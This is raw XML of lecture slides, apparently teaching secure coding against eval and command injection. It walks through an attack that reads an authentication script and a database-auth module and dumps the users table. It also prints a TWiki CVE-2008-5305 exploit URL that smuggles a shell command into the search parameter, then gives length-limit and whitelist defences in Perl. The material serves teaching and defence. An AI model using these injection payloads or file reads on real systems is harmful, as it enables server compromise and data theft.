        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5969007" y="2819400"/>
            <a:ext cx="484632" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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6" name="Picture 4" descr="C:\Documents and Settings\lshields\Local Settings\Temporary Internet Files\Content.IE5\F2FAFZCH\MC900433842[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5664207" y="3352800"/>
            <a:ext cx="990600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5969007" y="4343400"/>
            <a:ext cx="484632" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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8" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1066800"/>
            <a:ext cx="3352800" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" u="sng" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Becoming a persistent threat:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" u="sng" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="0" u="sng" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Discovery of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Delivery of a crafted payload to make exploit and future exploits easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We own the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cat authenticate.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat /etc/apache2/modules/DBAuth.pm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Delivery of new crafted payload for dumping database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SELECT * FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> We own the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>All your data are belong to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" pitchFamily="49"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13208"/>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Real World Example – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>TWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55354" y="1467217"/>
            <a:ext cx="7467600" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>CVE-2008-5305</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0"/>
              <a:t>– The search parameter of the website was being placed into an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0"/>
              <a:t> function, allowing remote users to fully exploit the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55354" y="2767692"/>
            <a:ext cx="7781925" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-20846" y="2257917"/>
            <a:ext cx="7187045" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90160" y="5805264"/>
            <a:ext cx="8610601" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>3F%60%22+search%3D%22xyzzy%22%7D%25&amp;scope=all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>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25027"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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="1066800"/>
            <a:ext cx="7696200" cy="50371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1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restrict length  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(option doesn't need to be 100 chars long)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (only allow specific commands)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="251520" y="2276872"/>
            <a:ext cx="8153400" cy="3352800"/>
            <a:chOff x="457200" y="2514600"/>
            <a:chExt cx="8153400" cy="3352800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="2514600"/>
              <a:ext cx="8153400" cy="33528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   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $options = &lt;STDIN&gt;;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> length($options) &gt; 100</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3   {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4      error();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5   }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>6   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ($options =~ m/^[a-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
